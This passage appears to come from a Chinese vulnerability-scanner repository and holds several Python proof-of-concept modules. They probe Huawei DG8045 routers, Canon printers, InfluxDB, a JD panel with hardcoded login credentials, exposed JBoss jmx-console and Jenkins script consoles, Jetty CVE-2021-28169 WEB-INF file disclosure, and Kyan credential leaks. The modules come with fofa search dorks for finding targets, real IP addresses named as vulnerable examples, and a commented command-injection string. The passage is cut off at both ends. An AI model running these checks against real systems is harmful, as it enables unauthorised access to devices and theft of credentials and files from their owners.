66 | if self._honeypot_check(vuln[1]) == True:
67 | vuln[0] = False
68 |
69 | return vuln
70 |
71 | def _attack(self):
72 | return self._verify()
--------------------------------------------------------------------------------
/poc/Huawei/Info_Disclosure_DG8045/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 | class POC(POCBase):
10 |
11 | _info = {
12 | "author" : "jijue", # POC作者
13 | "version" : "1", # POC版本,默认是1
14 | "CreateDate" : "2022-01-01", # POC创建时间
15 | "UpdateDate" : "2022-01-01", # POC创建时间
16 | "PocDesc" : """
17 | 略
18 | """, # POC描述,写更新描述,没有就不写
19 |
20 | "name" : "华为路由器敏感信息泄露 DG8045 Router 1.0", # 漏洞名称
21 | "VulnID" : "oFx-2022-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
22 | "AppName" : "华为DG8045路由器", # 漏洞应用名称
23 | "AppVersion" : "1.0版本", # 漏洞应用版本
24 | "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
25 | "VulnDesc" : """
26 | 路由器默认密码是序列号的最后8位
27 | """, # 漏洞简要描述
28 |
29 | "fofa-dork":"""
30 | app="DG8045-Home-Gateway-DG8045"
31 | """, # fofa搜索语句
32 | "example" : "", # 存在漏洞的演示url,写一个就可以了
33 | "exp_img" : "", # 先不管
34 | }
35 |
36 | def _verify(self):
37 | """
38 | 返回vuln
39 |
40 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
41 |
42 | 不存在漏洞:vuln = [False,""]
43 | """
44 | vuln = [False,""]
45 | url = self.target + "/api/system/deviceinfo" # url自己按需调整
46 |
47 |
48 | headers = {
49 | "User-Agent":get_random_ua(),
50 | "Connection":"close",
51 | "X-Requested-With": "XMLHttpRequest",
52 | # "Content-Type": "application/x-www-form-urlencoded",
53 | }
54 |
55 | try:
56 | """
57 | 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
58 | """
59 | req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
60 | if "SerialNumber" in req.text and "DeviceName" in req.text:
61 | vuln = [True,req.text]
62 | else:
63 | vuln = [False,req.text]
64 | except Exception as e:
65 | raise e
66 |
67 | # 以下逻辑酌情使用
68 | if self._honeypot_check(vuln[1]) == True:
69 | vuln[0] = False
70 |
71 | return vuln
72 |
73 | def _attack(self):
74 | return self._verify()
--------------------------------------------------------------------------------
/poc/IRADVC3325_佳能打印机/Unauth_Access/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 | class POC(POCBase):
10 |
11 | _info = {
12 | "author" : "hansi", # POC作者
13 | "version" : "1", # POC版本,默认是1
14 | "CreateDate" : "2022-10-24", # POC创建时间
15 | "UpdateDate" : "2022-10-24", # POC创建时间
16 | "PocDesc" : """
17 |
18 | """, # POC描述,写更新描述,没有就不写
19 |
20 | "name" : "佳能打印机设备存在未授权访问漏洞", # 漏洞名称
21 | "VulnID" : "oFx-2022-1027", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
22 | "AppName" : "", # 漏洞应用名称
23 | "AppVersion" : "", # 漏洞应用版本
24 | "VulnDate" : "2022-10-27", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
25 | "VulnDesc" : """
26 |
27 | """, # 漏洞简要描述
28 |
29 | "fofa-dork":"""
30 |
31 | """, # fofa搜索语句
32 | "example" : "", # 存在漏洞的演示url,写一个就可以了
33 | "exp_img" : "", # 先不管
34 | }
35 |
36 |
37 | def _verify(self):
38 | """
39 | 返回vuln
40 |
41 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
42 |
43 | 不存在漏洞:vuln = [False,""]
44 | """
45 | vuln = [False,""]
46 | url = self.target + "/" # url自己按需调整
47 |
48 |
49 | headers = {"User-Agent":get_random_ua(),
50 | "Connection":"close",
51 | "Content-Type": "application/x-www-form-urlencoded",
52 | }
53 |
54 | try:
55 | """
56 | 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
57 | """
58 | req = requests.get(url,headers = headers, proxies = self.proxy ,timeout = self.timeout,verify = False)
59 | if req.status_code == 200 and "设备名称 :" and "C3325 (QTS24430)" in req.text:
60 | vuln = [True,req.text]
61 | else:
62 | vuln = [False,req.text]
63 | except Exception as e:
64 | raise e
65 |
66 | # 以下逻辑酌情使用
67 | if self._honeypot_check(vuln[1]) == True:
68 | vuln[0] = False
69 |
70 | return vuln
71 |
72 | def _attack(self):
73 | return self._verify()
74 |
--------------------------------------------------------------------------------
/poc/InfluxDB/FingerPrint/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 | class POC(POCBase):
10 |
11 | _info = {
12 | "author" : "jijue", # POC作者
13 | "version" : "1", # POC版本,默认是1
14 | "CreateDate" : "2022-01-01", # POC创建时间
15 | "UpdateDate" : "2022-01-01", # POC创建时间
16 | "PocDesc" : """
17 | 略
18 | """, # POC描述,写更新描述,没有就不写
19 |
20 | "name" : "InfluxDB指纹识别", # 漏洞名称
21 | "VulnID" : "oFx-2022-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
22 | "AppName" : "InfluxDB", # 漏洞应用名称
23 | "AppVersion" : "", # 漏洞应用版本
24 | "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
25 | "VulnDesc" : """
26 | InfluxDB默认把Web界面运行在8083端口、把API接口运行在8086端口
27 | 响应包是会有两个头,分别是X-Influxdb-Version和X-Influxdb-Build
28 |
29 | 该指纹识别成功后会直接返回header给控制台,方便肉眼识别
30 | """, # 漏洞简要描述
31 |
32 | "fofa-dork":"""
33 | app="influxdata-InfluxDB"
34 | """, # fofa搜索语句
35 | "example" : "", # 存在漏洞的演示url,写一个就可以了
36 | "exp_img" : "", # 先不管
37 | }
38 |
39 | def _verify(self):
40 | """
41 | 返回vuln
42 |
43 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
44 |
45 | 不存在漏洞:vuln = [False,""]
46 | """
47 | vuln = [False,""]
48 | url = self.target + "" # url自己按需调整
49 |
50 |
51 | headers = {"User-Agent":get_random_ua(),
52 | "Connection":"close",
53 | # "Content-Type": "application/x-www-form-urlencoded",
54 | }
55 |
56 | try:
57 | """
58 | 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
59 | """
60 | req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
61 | if "X-Influxdb-Version" in req.headers or "X-Influxdb-Build" in req.headers:
62 | vuln = [True,req.headers]
63 | else:
64 | vuln = [False,req.headers]
65 | except Exception as e:
66 | raise e
67 |
68 | # 以下逻辑酌情使用
69 | if self._honeypot_check(vuln[1]) == True:
70 | vuln[0] = False
71 |
72 | return vuln
73 |
74 | def _attack(self):
75 | return self._verify()
--------------------------------------------------------------------------------
/poc/JDFreeFuck/Weak_Pass/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 |
6 | # ...
7 | import urllib3
8 | urllib3.disable_warnings()
9 |
10 | class POC(POCBase):
11 |
12 | _info = {
13 | "author" : "hansi", # POC作者
14 | "version" : "1", # POC版本,默认是1
15 | "CreateDate" : "2022-1-10", # POC创建时间
16 | "UpdateDate" : "2022-1-10", # POC创建时间
17 | "PocDesc" : """
18 |
19 |
20 | """, # POC描述,写更新描述,没有就不写
21 |
22 | "name" : "JDFreeFuck后台弱口令漏洞", # 漏洞名称
23 | "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
24 | "AppName" : "JD_FreeFuck后台", # 漏洞应用名称
25 | "AppVersion" : "无", # 漏洞应用版本
26 | "VulnDate" : "2021-05-10", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
27 | "VulnDesc" : """
28 |
29 | """, # 漏洞简要描述
30 |
31 | "fofa-dork": """
32 | ttitle="京东薅羊毛控制面板"
33 | """ , # fofa搜索语句
34 | "example" : "http://47.106.173.212:5678/", # 存在漏洞的演示url,写一个就可以了
35 | "exp_img" : "", # 先不管
36 |
37 | }
38 |
39 |
40 |
41 | def _verify(self):
42 | """
43 | 返回vuln
44 |
45 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
46 |
47 | 不存在漏洞:vuln = [False,""]
48 | """
49 | vuln = [False,""]
50 | url = self.target + "/auth" # url自己按需调整
51 | # date="command1=shell:ifconfig| dd of=/tmp/a.txt"
52 |
53 | headers = {"User-Agent":get_random_ua(),
54 | "Connection":"close",
55 | "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8 ",
56 | }
57 | data = "username=useradmin&password=supermanito"
58 | try:
59 | """
60 | 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动
61 | """
62 | req = requests.post(url,headers = headers , data = data, proxies = self.proxy , timeout = self.timeout,verify = False)
63 | if "{\"err\":0}" in req.text and req.status_code == 200 :
64 | vuln = [True,req.text]
65 | else:
66 | vuln = [False,req.text]
67 | except Exception as e:
68 | raise e
69 |
70 | if self._honeypot_check(vuln[1]) == True:
71 | vuln[0] = False
72 |
73 | return vuln
74 |
75 |
76 | def _attack(self):
77 | return self._verify()
--------------------------------------------------------------------------------
/poc/Jboss/Unauth_Access/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 |
6 | # ...
7 | import urllib3
8 | urllib3.disable_warnings()
9 |
10 | class POC(POCBase):
11 |
12 | _info = {
13 | "author" : "jijue", # POC作者
14 | "version" : "1", # POC版本,默认是1
15 | "CreateDate" : "2021-06-09", # POC创建时间
16 | "UpdateDate" : "2021-06-09", # POC创建时间
17 | "PocDesc" : """
18 | 略
19 | """, # POC描述,写更新描述,没有就不写
20 |
21 | "name" : "Jboss未授权访问", # 漏洞名称
22 | "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
23 |
24 | "AppName" : "Jboss", # 漏洞应用名称
25 | "AppVersion" : "低版本", # 漏洞应用版本
26 | "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
27 | "VulnDesc" : """
28 | 在低版本中,默认可以访问Jboss web控制台(http://127.0.0.1:8080/jmx-console),无需用户名和密码。
29 | """, # 漏洞简要描述
30 |
31 | "fofa-dork":"", # fofa搜索语句
32 | "example" : "210.212.62.107:8080", # 存在漏洞的演示url,写一个就可以了
33 | "exp_img" : "", # 先不管
34 |
35 | }
36 |
37 | timeout = 10
38 |
39 | def _verify(self):
40 | """
41 | 返回vuln
42 |
43 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
44 |
45 | 不存在漏洞:vuln = [False,""]
46 | """
47 | vuln = [False,""]
48 | url = self.target + "/jmx-console" # url自己按需调整
49 |
50 | headers = {"User-Agent":get_random_ua(),
51 | "Connection":"close",
52 | # "Content-Type": "application/x-www-form-urlencoded",
53 | }
54 |
55 | try:
56 | """
57 | 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动
58 | """
59 | req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
60 | if req.status_code == 200 and "Catalina" in req.text:
61 | vuln = [True,req.text]
62 | else:
63 | vuln = [False,req.text]
64 | except Exception as e:
65 | raise e
66 |
67 | if self._honeypot_check(vuln[1]) == True:
68 | vuln[0] = False
69 |
70 | return vuln
71 |
72 | def _attack(self):
73 | return self._verify()
74 |
--------------------------------------------------------------------------------
/poc/Jenkins/Unauth_Access/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 |
6 | # ...
7 | import urllib3
8 | urllib3.disable_warnings()
9 |
10 | class POC(POCBase):
11 |
12 | _info = {
13 | "author" : "jijue", # POC作者
14 | "version" : "1", # POC版本,默认是1
15 | "CreateDate" : "2021-06-09", # POC创建时间
16 | "UpdateDate" : "2021-06-09", # POC创建时间
17 | "PocDesc" : """
18 | 略
19 | """, # POC描述,写更新描述,没有就不写
20 |
21 | "name" : "Jenkins未授权访问", # 漏洞名称
22 | "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
23 |
24 | "AppName" : "Jenkins", # 漏洞应用名称
25 | "AppVersion" : "无", # 漏洞应用版本
26 | "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
27 | "VulnDesc" : """
28 | Jenkins未设置密码,导致未授权访问。
29 | """, # 漏洞简要描述
30 |
31 | "fofa-dork":"", # fofa搜索语句
32 | "example" : "", # 存在漏洞的演示url,写一个就可以了
33 | "exp_img" : "", # 先不管
34 |
35 | }
36 |
37 | timeout = 10
38 |
39 | def _verify(self):
40 | """
41 | 返回vuln
42 |
43 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
44 |
45 | 不存在漏洞:vuln = [False,""]
46 | """
47 | vuln = [False,""]
48 | url = self.target + "/script" # url自己按需调整
49 |
50 |
51 | headers = {"User-Agent":get_random_ua(),
52 | "Connection":"close",
53 | # "Content-Type": "application/x-www-form-urlencoded",
54 | }
55 |
56 | try:
57 | """
58 | 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动
59 | """
60 | req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
61 | if req.status_code == 200 and "Script Console" in req.text:
62 | vuln = [True,req.text]
63 | else:
64 | vuln = [False,req.text]
65 | except Exception as e:
66 | raise e
67 |
68 | if self._honeypot_check(vuln[1]) == True:
69 | vuln[0] = False
70 |
71 | return vuln
72 |
73 | def _attack(self):
74 | return self._verify()
--------------------------------------------------------------------------------
/poc/Jetty/Info_Disclosure_CVE_2021_28169/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | from urllib import request
3 | import ssl
4 | import chardet
5 | from lib.core.common import url_handle,get_random_ua
6 | from lib.core.poc import POCBase
7 |
8 | import urllib3
9 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
10 |
11 | class POC(POCBase):
12 |
13 | _info = {
14 | "author" : "jijue", # POC作者
15 | "version" : "1", # POC版本,默认是1
16 | "CreateDate" : "2021-06-09", # POC创建时间
17 | "UpdateDate" : "2021-06-09", # POC创建时间
18 | "PocDesc" : """
19 | 略
20 | """, # POC描述,写更新描述,没有就不写
21 |
22 | "name" : "Jetty Utility Servlets ConcatServlet 双解码信息泄露漏洞 (CVE-2021-28169)", # 漏洞名称
23 | "VulnID" : "CVE-2021-28169", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
24 | "AppName" : "Jetty", # 漏洞应用名称
25 | "AppVersion" : "", # 漏洞应用版本
26 | "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
27 | "VulnDesc" : """
28 | Eclipse Jetty 是一个 Java Web 服务器和 Java Servlet 容器。
29 |
30 | 在 9.4.40、10.0.2、11.0.2 版本之前,
31 | Jetty Servlets 中的ConcatServlet和WelcomeFilter类受到双重解码错误的影响。
32 | 如果开发者手动使用这两个类,攻击者可以利用它们下载WEB-INF目录中的任意敏感文件。
33 | """, # 漏洞简要描述
34 |
35 | "fofa-dork":"""
36 |
37 | """, # fofa搜索语句
38 | "example" : "", # 存在漏洞的演示url,写一个就可以了
39 | "exp_img" : "", # 先不管
40 | }
41 |
42 | def _verify(self):
43 | vuln = [False,""]
44 | url = self.target + "/static?/%2557EB-INF/web.xml" # url自己按需调整
45 |
46 | headers = {"User-Agent":get_random_ua(),}
47 |
48 | try:
49 | # verify
50 | context = ssl._create_unverified_context()
51 | req = request.Request(url,headers = headers)
52 | response = request.urlopen(req,timeout=self.timeout,context = context)
53 | html = response.read()
54 |
55 | status_code = response.getcode()
56 |
57 | if "" in str(html) and status_code == 200 and "application/xml" in [_v for _k,_v in response.getheaders() if "Content-Type" in _k]:
58 | vuln = [True,html]
59 | except Exception as e:
60 | raise e
61 |
62 | return vuln
63 |
64 | def _attack(self):
65 | return self._verify()
--------------------------------------------------------------------------------
/poc/Kyan/Info_Disclosure/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 |
6 | # ...
7 | import urllib3
8 | urllib3.disable_warnings()
9 |
10 | class POC(POCBase):
11 |
12 | _info = {
13 | "author" : "hansi & jijue", # POC作者
14 | "version" : "3", # POC版本,默认是1
15 | "CreateDate" : "2021-06-18", # POC创建时间
16 | "UpdateDate" : "2021-06-18", # POC创建时间
17 | "PocDesc" : """
18 | v2 原POC逻辑过于简单存在大量误报,现已优化
19 | v3 v2有缺陷,再次优化
20 | """, # POC描述,写更新描述,没有就不写
21 |
22 | "name" : "Kyan网络监控设备信息泄露", # 漏洞名称
23 | "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
24 | "AppName" : "", # 漏洞应用名称
25 | "AppVersion" : "无", # 漏洞应用版本
26 | "VulnDate" : "2021-03-10", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
27 | "VulnDesc" : """
28 | Kyan 网络监控设备 存在账号密码泄露漏洞,攻击者通过漏洞可以获得账号密码和后台权限
29 | """, # 漏洞简要描述
30 |
31 | "fofa-dork":"""
32 | title="platform - Login"
33 | """, # fofa搜索语句
34 | "example" : "", # 存在漏洞的演示url,写一个就可以了
35 | "exp_img" : "", # 先不管
36 |
37 | }
38 |
39 | def _verify(self):
40 | """
41 | 返回vuln
42 |
43 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
44 |
45 | 不存在漏洞:vuln = [False,""]
46 | """
47 | vuln = [False,""]
48 | url = self.target + "/hosts" # url自己按需调整
49 |
50 |
51 | headers = {"User-Agent":get_random_ua(),
52 | "Connection":"close",
53 | # "Content-Type": "application/x-www-form-urlencoded",
54 | }
55 |
56 | try:
57 | """
58 | 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动
59 | """
60 | req = requests.get(url,headers = headers , proxies = self.proxy , timeout = self.timeout,verify = False)
61 | if req.status_code == 200 and "UserName=" in req.text and "